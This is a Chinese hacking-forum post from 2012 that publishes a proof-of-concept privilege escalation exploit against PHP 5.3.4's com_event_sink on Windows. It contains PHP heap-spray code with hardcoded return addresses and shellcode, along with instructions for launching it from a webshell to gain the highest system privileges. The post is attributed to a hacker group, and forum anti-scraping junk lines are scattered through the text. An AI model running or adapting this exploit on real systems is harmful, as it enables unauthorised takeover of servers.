中国网络渗透测试联盟
标题:
PHP 5.3.4(WIN) COM_SINK权限提升漏洞
[打印本页]
作者:
admin
时间:
2012-11-9 21:08
标题:
PHP 5.3.4(WIN) COM_SINK权限提升漏洞
PHP最新版已经更新至5.4.x,不过中国大陆尚处于在5.2.x和5.3.x更替的阶段。存在漏洞的php存在于5.3.x版本中
/ N1 ~/ m7 ^2 a3 F" [: B9 e) u. p
" c* |# t& k$ W: \. s+ V# {4 t
测试方法如下:cmd /c x:\php\php.exe x:\test.php
9 L. M" T/ \5 y' z- ?% e+ ?
8 r) {- Q. Q2 c
下载php程序至本地,然后使用php.exe解析php即可。Webshell上面使用php的exec等函数执行,或者使用Wscript.shell调用cmd.exe然后 /c x:\php\php.exe x:\xxxx\test.php
6 H0 K+ o5 f4 S6 |
这里是两个测试的截图:
+ {4 Y& O' k1 K7 ]2 @5 }
4 f! V4 B- F7 l5 T% W
1 W# _' V" K' a1 D, |$ `
& a3 a9 \3 S- G% l% m+ K, @
6 P5 G5 \% A0 e# s0 v. u8 h, H
B, X% N7 K: M* g' M+ v; }0 N
成功利用此漏洞的攻击者将获得系统的最高权限
( ^# ~+ r& z" G8 B
( Q/ Z) O& P3 n: V6 k- P' I# C
+ z% J6 _- x4 W/ u* u: T( C
6 c, {4 R& V I. U" y
! _5 n- L& q& ~
; ]" i( u3 V, ?
关于漏洞分析稍后附上。一下是PoC代码:
; H# g2 b* f# L0 q% C1 L
4 @. u9 w5 D' u* ^+ ~3 @" t5 X
<?php
+ {6 s5 P: D" C+ G
//PHP 5.3.4(Win版) com_event_sink()模型权限提升漏洞
* I8 ]: X: V* u% H
//$eip ="\x44\x43\x42\x41";
8 ^$ z% O2 B. l* S
$eip= "\x4b\xe8\x57\x78";
0 _% W& ^5 t% J- F5 }" A
$eax ="\x80\x01\x8d\x04";
q$ K5 F. I1 X5 y, c& n6 c4 D
$deodrant="";
9 u$ i! \# J/ t1 {
$axespray = str_repeat($eip.$eax,0x80);
6 @1 Y& W2 Z' R q T
//048d0190
" M6 R. @& z, W/ e, m
echo strlen($axespray);
9 b- T3 O) H9 T$ y8 K9 w( e
echo "PHP 5.3.4(WIN) COM_SINK Privilege Escalation\n";
' N* c8 f# E5 O$ G. B0 O3 R
echo "Silic Group Hacker Army - BlackBap.Org";
/ _5 Y' c- ?+ a) {
//19200 ==4B32 4b00
0 }" u, q* D% B d w
for($axeeffect=0;$axeeffect<0x4B32;$axeeffect++){$deodrant.=$axespray;}
6 w4 e& M0 `7 ~% p& j ?2 ]8 J4 H
$terminate = "T";
$ l9 `4 q; {! Z2 P! C
$u[] =$deodrant;
( {0 H- X# `, x9 v' a
$r[] =$deodrant.$terminate;
0 }- I6 l+ @) @# I
$a[] =$deodrant.$terminate;
% ~* X6 @6 F& z: X4 b
$s[] =$deodrant.$terminate;
' g% F+ k' x7 N
//$vVar = new VARIANT(0x048d0038+$offset); 这里是可控可改的
* ~' H3 Z. K m) q
$vVar = new VARIANT(0x048d0000+180);
; a& {5 j- ~3 T7 C8 |( x3 O C
//弹窗代码(Shellcode)
2 B7 E- N& l* E) t! j/ K( s
$buffer = "\x90\x90\x90"."\xB9\x38\xDD\x82\x7C\x33\xC0\xBB"."\xD8\x0A\x86\x7C\x51\x50\xFF\xd3";
# O- l( u$ O$ s3 \( ~
$var2 = new VARIANT(0x41414242);
$ j9 ~/ i; `, c: U& p z
com_event_sink($vVar,$var2,$buffer);
9 i+ Z4 H, n8 P% g5 |
?>
3 N; p9 \! ] i5 L u; ~7 i
[attach]113[/attach][attach]114[/attach]
欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/)
Powered by Discuz! X3.2